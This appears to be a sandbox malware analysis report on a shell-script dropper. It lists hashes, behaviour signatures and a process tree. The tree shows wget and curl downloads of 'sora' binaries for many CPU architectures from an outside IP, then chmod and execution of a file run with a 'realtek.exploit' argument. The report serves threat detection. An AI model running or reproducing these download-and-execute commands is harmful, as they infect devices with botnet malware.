Analysis
-
max time kernel
32s -
max time network
60s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:36
Static task
static1
Behavioral task
behavioral1
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
-
Size
2KB
-
MD5
2a963ff4fb99086ab454f4f26acf8b74
-
SHA1
0830412185a29f4230a85d8f6eb4d15f2a165aea
-
SHA256
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
-
SHA512
7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 837 chmod 849 chmod 877 chmod 744 chmod 750 chmod 756 chmod 774 chmod 807 chmod 843 chmod 733 chmod 762 chmod 791 chmod 827 chmod 860 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 735 robben /tmp/robben 745 robben /tmp/robben 751 robben /tmp/robben 757 robben /tmp/robben 763 robben /tmp/robben 775 robben /tmp/robben 793 robben /tmp/robben 809 robben /tmp/robben 829 robben /tmp/robben 838 robben /tmp/robben 844 robben /tmp/robben 850 robben /tmp/robben 861 robben /tmp/robben 879 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 737 wget 740 curl 743 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Processes
-
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh1⤵
- Writes file to tmp directory
PID:707 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:715
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:722
-
-
/bin/catcat sora.x862⤵PID:732
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:737
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:740
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:745
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:747
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:748
-
-
/bin/catcat sora.x86_642⤵PID:749
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:751
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:753
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:754
-
-
/bin/catcat sora.i4682⤵PID:755
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:759
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:760
-
-
/bin/catcat sora.i6862⤵PID:761
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:763
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:765
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:766
-
-
/bin/catcat sora.mpsl2⤵PID:773
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:775
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:778
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:782
-
-
/bin/catcat sora.arm42⤵PID:789
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:795
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:798
-
-
/bin/catcat sora.arm52⤵PID:805
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:809
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:811
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:815
-
-
/bin/catcat sora.arm62⤵PID:825
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:829
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:832
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:834
-
-
/bin/catcat sora.arm72⤵PID:836
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:838
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:840
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:841
-
-
/bin/catcat sora.ppc2⤵PID:842
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:844
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:846
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:847
-
-
/bin/catcat sora.ppc440fp2⤵PID:848
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:850
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:852
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:853
-
-
/bin/catcat sora.m68k2⤵PID:859
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:861
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:864
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:868
-
-
/bin/catcat sora.sh42⤵PID:875
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:879
-